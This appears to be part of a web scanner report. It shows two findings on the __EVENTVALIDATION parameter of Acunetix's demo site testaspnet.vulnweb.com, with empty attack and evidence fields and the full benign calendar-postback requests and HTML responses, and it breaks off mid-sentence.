URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8307&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAZY2todoIZGRkOHSckbgOxL4%2BiYOLqvGkGz2os6w%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQhvG%2BDgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJg5ib26%2FpYgTwewuhVEtIqZa1w0g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:34 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAZY2todoIZGRkOHSckbgOxL4+iYOLqvGkGz2os6w=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQhvG+DgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJg5ib26/pYgTwewuhVEtIqZa1w0g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:White" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8583&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAaEePetsIZGRkCEQdRmw8tgHs5RfgzOawa8KzZtw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQptDEBQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCknk7%2FmN%2B67FTty2ZxkPBCY9N0%2B8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:57 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAaEePetsIZGRkCEQdRmw8tgHs5RfgzOawa8KzZtw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQptDEBQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCknk7/mN+67FTty2ZxkPBCY9N0+8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:White" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site 